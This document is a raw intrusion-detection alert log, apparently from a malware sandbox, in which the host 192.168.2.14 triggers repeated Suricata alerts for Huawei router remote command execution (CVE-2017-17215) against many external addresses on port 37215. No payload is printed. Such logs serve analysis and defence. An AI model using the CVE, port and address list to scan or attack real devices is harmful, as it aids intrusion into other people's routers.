                                                    07/10/24-08:26:13.787067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4031037215192.168.2.1441.136.152.112
                                                    07/10/24-08:27:27.114330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4621237215192.168.2.1441.29.32.33
                                                    07/10/24-08:26:47.840921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4939837215192.168.2.14197.110.66.112
                                                    07/10/24-08:26:11.133869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4281837215192.168.2.14157.160.52.78
                                                    07/10/24-08:26:34.252439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4722037215192.168.2.1441.210.126.34
                                                    07/10/24-08:26:20.119674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4664437215192.168.2.1441.222.202.58
                                                    07/10/24-08:26:59.550214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4238037215192.168.2.14157.224.55.176
                                                    07/10/24-08:26:11.126416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5713237215192.168.2.14153.104.213.89
                                                    07/10/24-08:27:10.652052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4453637215192.168.2.14197.72.209.121
                                                    07/10/24-08:26:47.881197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3910237215192.168.2.1441.230.110.6
                                                    07/10/24-08:26:34.212749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5618837215192.168.2.1441.177.174.226
                                                    07/10/24-08:26:49.755062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3456637215192.168.2.14197.64.136.24
                                                    07/10/24-08:27:17.111438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3380637215192.168.2.14186.125.32.188
                                                    07/10/24-08:26:22.285937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4521237215192.168.2.14197.136.152.186
                                                    07/10/24-08:26:26.437394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6008437215192.168.2.14157.200.18.199
                                                    07/10/24-08:27:33.961226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5704437215192.168.2.14157.185.107.60
                                                    07/10/24-08:26:23.284945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5968437215192.168.2.1448.70.197.202
                                                    07/10/24-08:26:18.011979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4892237215192.168.2.14197.176.82.87
                                                    07/10/24-08:26:59.637493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4829837215192.168.2.14212.123.209.126
                                                    07/10/24-08:27:10.723777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5335237215192.168.2.1441.188.159.27
                                                    07/10/24-08:26:49.777925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5931237215192.168.2.14157.15.170.125
                                                    07/10/24-08:27:14.807348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3578437215192.168.2.1441.171.73.6
                                                    07/10/24-08:27:14.875328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3334837215192.168.2.1464.56.254.204
                                                    07/10/24-08:26:23.350374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079037215192.168.2.14197.163.90.54
                                                    07/10/24-08:26:36.383981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5278037215192.168.2.14212.236.174.49
                                                    07/10/24-08:27:30.533467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3947037215192.168.2.14197.29.135.251
                                                    07/10/24-08:27:13.999286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5642637215192.168.2.14157.248.106.239
                                                    07/10/24-08:26:55.395461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079237215192.168.2.14197.114.8.17
                                                    07/10/24-08:27:22.939147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4766037215192.168.2.14157.78.51.19
                                                    07/10/24-08:26:28.723729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895637215192.168.2.14157.135.53.218
                                                    07/10/24-08:27:05.134098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4936637215192.168.2.14197.159.187.182
                                                    07/10/24-08:26:28.774897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032437215192.168.2.1491.166.199.8
                                                    07/10/24-08:26:38.619683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4289837215192.168.2.14197.39.66.13
                                                    07/10/24-08:26:42.366312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4418837215192.168.2.14157.196.17.173
                                                    07/10/24-08:26:49.859593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4840037215192.168.2.1495.108.150.28
                                                    07/10/24-08:26:11.136124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3436437215192.168.2.1441.68.57.166
                                                    07/10/24-08:27:17.079394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5040837215192.168.2.14157.14.15.117
                                                    07/10/24-08:26:41.325591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4822637215192.168.2.14149.33.74.106
                                                    07/10/24-08:26:53.177713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443237215192.168.2.14197.74.255.55
                                                    07/10/24-08:27:11.477430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5790237215192.168.2.14197.33.37.151
                                                    07/10/24-08:27:02.883243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973637215192.168.2.14157.112.236.62
                                                    07/10/24-08:26:20.152131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845237215192.168.2.14157.107.20.190
                                                    07/10/24-08:26:49.813021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4552637215192.168.2.14197.61.90.4
                                                    07/10/24-08:26:15.840826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703237215192.168.2.14197.174.194.120
                                                    07/10/24-08:26:17.986594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3809237215192.168.2.14197.202.8.121
                                                    07/10/24-08:27:20.422922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3501237215192.168.2.14157.66.136.37
                                                    07/10/24-08:26:52.036040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4726637215192.168.2.1441.192.49.229
                                                    07/10/24-08:27:11.537830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4324237215192.168.2.1431.189.35.217
                                                    07/10/24-08:26:48.008674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257237215192.168.2.1441.11.23.109
                                                    07/10/24-08:26:11.619310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4707437215192.168.2.14205.116.213.167
                                                    07/10/24-08:27:13.828157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5957637215192.168.2.14123.137.83.112
                                                    07/10/24-08:26:13.849175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3872837215192.168.2.14157.7.182.67
                                                    07/10/24-08:26:13.849744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3969637215192.168.2.14197.222.209.183
                                                    07/10/24-08:26:36.327506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5122237215192.168.2.14157.136.174.221
                                                    07/10/24-08:26:48.027883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4062637215192.168.2.1441.15.28.41
                                                    07/10/24-08:27:30.483664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4890237215192.168.2.1441.187.181.85
                                                    07/10/24-08:26:25.469425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3498637215192.168.2.1431.29.132.220
                                                    07/10/24-08:26:43.881228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5104237215192.168.2.1441.169.3.171
                                                    07/10/24-08:27:07.281764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4721037215192.168.2.1454.47.75.175
                                                    07/10/24-08:26:26.622039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3691437215192.168.2.1441.42.23.166
                                                    07/10/24-08:26:18.022260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3633237215192.168.2.1491.22.145.102
                                                    07/10/24-08:26:28.624791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5267037215192.168.2.14197.27.27.152
                                                    07/10/24-08:26:41.551602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4830237215192.168.2.14193.96.235.189
                                                    07/10/24-08:27:33.882743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4192037215192.168.2.14157.78.23.199
                                                    07/10/24-08:26:13.657783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4253437215192.168.2.14197.133.173.153
                                                    07/10/24-08:27:07.337893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5525837215192.168.2.1441.69.247.210
                                                    07/10/24-08:27:30.475400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4939437215192.168.2.1495.96.186.3
                                                    07/10/24-08:27:33.913856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3783837215192.168.2.14157.4.3.3
                                                    07/10/24-08:27:13.967608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3312637215192.168.2.14188.203.33.88
                                                    07/10/24-08:26:20.143169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5950637215192.168.2.1441.60.38.25
                                                    07/10/24-08:26:25.521266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768837215192.168.2.14197.5.4.68
                                                    07/10/24-08:26:11.168709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5013637215192.168.2.14157.61.150.149
                                                    07/10/24-08:27:11.484903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4727437215192.168.2.1452.83.199.206
                                                    07/10/24-08:27:14.829677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3536037215192.168.2.14157.167.105.151
                                                    07/10/24-08:26:14.784198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5616837215192.168.2.1441.253.206.129
                                                    07/10/24-08:27:23.944748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5805037215192.168.2.14133.215.49.34
                                                    07/10/24-08:27:27.099101TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5283637215192.168.2.14157.136.49.217
                                                    07/10/24-08:26:42.427217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5765837215192.168.2.14157.1.115.88
                                                    07/10/24-08:26:45.660346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4842637215192.168.2.1441.238.29.52
                                                    07/10/24-08:26:11.622181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857837215192.168.2.1441.135.215.139
                                                    07/10/24-08:26:51.994120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4771437215192.168.2.14197.168.177.106
                                                    07/10/24-08:26:55.440682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5347037215192.168.2.1441.175.25.63
                                                    07/10/24-08:27:07.342046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3568037215192.168.2.14157.33.173.74
                                                    07/10/24-08:26:29.862669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5453837215192.168.2.14197.9.183.81
                                                    07/10/24-08:26:42.161476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3310237215192.168.2.14157.183.116.73
                                                    07/10/24-08:26:25.423128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4709837215192.168.2.1483.190.175.238
                                                    07/10/24-08:27:20.494991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5508637215192.168.2.14157.30.243.253
                                                    07/10/24-08:26:55.332212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983837215192.168.2.1489.123.226.177
                                                    07/10/24-08:26:59.753614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491037215192.168.2.14157.145.43.21
                                                    07/10/24-08:27:14.807488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4497837215192.168.2.14197.60.204.9
                                                    07/10/24-08:26:33.199657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4539637215192.168.2.14197.58.215.3
                                                    07/10/24-08:26:57.650835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6085837215192.168.2.14157.11.4.244
                                                    07/10/24-08:26:18.037758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4816637215192.168.2.1419.43.1.163
                                                    07/10/24-08:26:25.464906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3765837215192.168.2.14177.110.34.223
                                                    07/10/24-08:26:53.189669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5664437215192.168.2.14197.254.74.225
                                                    07/10/24-08:26:26.597070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5021437215192.168.2.14197.92.237.195
                                                    07/10/24-08:26:38.601191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5592237215192.168.2.1476.44.224.8
                                                    07/10/24-08:26:45.640337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3634037215192.168.2.1441.130.227.185
                                                    07/10/24-08:26:15.833755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4626437215192.168.2.1431.57.150.66
                                                    07/10/24-08:26:43.538160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3423837215192.168.2.14197.172.157.10
                                                    07/10/24-08:26:49.919552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3812437215192.168.2.1441.230.73.174
                                                    07/10/24-08:26:17.984477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5611437215192.168.2.14136.42.197.63
                                                    07/10/24-08:26:52.021968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238837215192.168.2.1441.37.87.163
                                                    07/10/24-08:26:43.610396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3906837215192.168.2.1441.116.44.79
                                                    07/10/24-08:27:20.428131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5641437215192.168.2.14213.90.159.159
                                                    07/10/24-08:26:36.372351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4597637215192.168.2.14197.93.74.141
                                                    07/10/24-08:27:23.792966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4359237215192.168.2.14157.107.16.165
                                                    07/10/24-08:27:23.854070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5023837215192.168.2.14197.59.196.204
                                                    07/10/24-08:27:10.598272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4831637215192.168.2.14157.253.130.57
                                                    07/10/24-08:26:26.593118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5454637215192.168.2.1441.149.147.206
                                                    07/10/24-08:27:10.574442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4741837215192.168.2.1441.162.211.220
                                                    07/10/24-08:26:43.896856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805637215192.168.2.14197.224.17.237
                                                    07/10/24-08:26:59.847925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4428437215192.168.2.14211.72.160.230
                                                    07/10/24-08:27:08.352248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6032437215192.168.2.14157.72.115.84
                                                    07/10/24-08:26:43.829086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4659237215192.168.2.14197.160.131.93
                                                    07/10/24-08:27:33.882743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236637215192.168.2.1441.237.127.4
                                                    07/10/24-08:26:51.964382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5062837215192.168.2.14151.7.40.199
                                                    07/10/24-08:26:55.390670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4833037215192.168.2.1441.79.82.144
                                                    07/10/24-08:27:13.912593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3648037215192.168.2.1441.248.123.72
                                                    07/10/24-08:26:23.328936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5748637215192.168.2.1424.242.194.24
                                                    07/10/24-08:26:29.858032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4916637215192.168.2.14201.173.144.185
                                                    07/10/24-08:26:15.862612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3521037215192.168.2.14147.47.19.176
                                                    07/10/24-08:26:45.690797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5826037215192.168.2.14157.120.232.223
                                                    07/10/24-08:26:29.746967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3747237215192.168.2.1448.16.44.193
                                                    07/10/24-08:26:28.906532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738437215192.168.2.14157.10.6.73
                                                    07/10/24-08:27:32.592658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5413837215192.168.2.14197.139.75.4
                                                    07/10/24-08:26:36.429054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924437215192.168.2.14197.250.148.84
                                                    07/10/24-08:26:28.912648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3421837215192.168.2.1441.168.167.153
                                                    07/10/24-08:26:43.540694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4648837215192.168.2.14197.156.166.105
                                                    07/10/24-08:27:20.412870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5226637215192.168.2.14197.140.71.74
                                                    07/10/24-08:26:14.823553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5886637215192.168.2.1418.75.159.116
                                                    07/10/24-08:26:14.826871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4220437215192.168.2.14197.9.152.82
                                                    07/10/24-08:26:28.775037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5398837215192.168.2.14109.240.75.246
                                                    07/10/24-08:27:05.121645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382237215192.168.2.14197.65.45.206
                                                    07/10/24-08:27:02.903191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4156237215192.168.2.1441.227.75.114
                                                    07/10/24-08:27:05.158700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5420637215192.168.2.1441.73.193.252
                                                    07/10/24-08:26:11.155522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4082437215192.168.2.14157.5.208.61
                                                    07/10/24-08:26:51.939939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3779837215192.168.2.1441.141.47.220
                                                    07/10/24-08:26:55.360027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3625237215192.168.2.14157.197.49.47
                                                    07/10/24-08:27:27.050359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573437215192.168.2.1441.142.234.58
                                                    07/10/24-08:26:55.268885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4668237215192.168.2.14197.250.255.62
                                                    07/10/24-08:27:17.087828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5608437215192.168.2.1441.124.18.162
                                                    07/10/24-08:26:31.090625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481037215192.168.2.14157.26.102.221
                                                    07/10/24-08:26:38.573653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5862237215192.168.2.14157.107.230.192
                                                    07/10/24-08:27:20.516215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5935637215192.168.2.1441.3.33.89
                                                    07/10/24-08:26:34.249351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3831837215192.168.2.14124.39.38.227
                                                    07/10/24-08:27:13.728066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3290437215192.168.2.1441.236.244.59
                                                    07/10/24-08:27:31.526473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3515837215192.168.2.14157.255.248.173
                                                    07/10/24-08:26:25.453376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5416037215192.168.2.14157.242.175.51
                                                    07/10/24-08:26:28.684788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5817437215192.168.2.14187.143.13.81
                                                    07/10/24-08:27:30.516859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026437215192.168.2.14197.220.116.86
                                                    07/10/24-08:26:25.420167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5497237215192.168.2.14157.148.240.18
                                                    07/10/24-08:26:41.462014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4728837215192.168.2.14157.56.10.99
                                                    07/10/24-08:27:29.335030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5504637215192.168.2.14157.210.190.77
                                                    07/10/24-08:26:18.028864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4544837215192.168.2.1444.167.64.149
                                                    07/10/24-08:26:57.525834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4712837215192.168.2.14167.213.133.214
                                                    07/10/24-08:26:17.992846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4993237215192.168.2.1441.226.196.153
                                                    07/10/24-08:27:13.714524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5008237215192.168.2.1441.239.179.229
                                                    07/10/24-08:27:11.513310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3787037215192.168.2.14210.222.179.78
                                                    07/10/24-08:26:55.268885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3478637215192.168.2.14197.166.90.145
                                                    07/10/24-08:26:57.620930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4668437215192.168.2.1441.48.39.234
                                                    07/10/24-08:27:30.477635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5838037215192.168.2.1471.168.185.63
                                                    07/10/24-08:26:13.741925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973237215192.168.2.14217.238.155.130
                                                    07/10/24-08:26:15.858486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3828637215192.168.2.14157.46.50.140
                                                    07/10/24-08:27:11.538879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6024837215192.168.2.14198.134.35.167
                                                    07/10/24-08:26:15.809769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3935837215192.168.2.14197.164.112.117
                                                    07/10/24-08:26:25.524455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3821837215192.168.2.14197.114.117.160
                                                    07/10/24-08:27:08.456007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5531437215192.168.2.14198.230.204.67
                                                    07/10/24-08:27:23.904429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5338837215192.168.2.14157.206.199.98
                                                    07/10/24-08:27:28.148356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5597037215192.168.2.14157.221.198.225
                                                    07/10/24-08:27:27.047085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3343837215192.168.2.14157.149.216.193
                                                    07/10/24-08:27:32.540139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5934237215192.168.2.1441.202.93.222
                                                    07/10/24-08:27:19.303785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3411637215192.168.2.14135.205.150.102
                                                    07/10/24-08:26:22.286064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3639237215192.168.2.1441.172.214.225
                                                    07/10/24-08:27:22.870482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5552237215192.168.2.14180.156.212.121
                                                    07/10/24-08:26:20.172678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5988837215192.168.2.14197.157.208.16
                                                    07/10/24-08:27:05.200421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5876437215192.168.2.14157.216.173.106
                                                    07/10/24-08:26:49.854683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4248037215192.168.2.1425.200.75.156
                                                    07/10/24-08:26:23.300149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5292837215192.168.2.14221.169.243.157
                                                    07/10/24-08:26:53.165242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4535637215192.168.2.14197.226.249.55
                                                    07/10/24-08:26:47.920838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5764437215192.168.2.14197.182.33.45
                                                    07/10/24-08:26:23.359612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3584437215192.168.2.1441.57.12.136
                                                    07/10/24-08:27:14.834024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5682837215192.168.2.1472.245.38.83
                                                    07/10/24-08:26:55.470125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5889237215192.168.2.14197.58.59.199
                                                    07/10/24-08:27:07.369689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4155237215192.168.2.14157.17.43.7
                                                    07/10/24-08:26:43.927826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3638437215192.168.2.1443.151.43.194
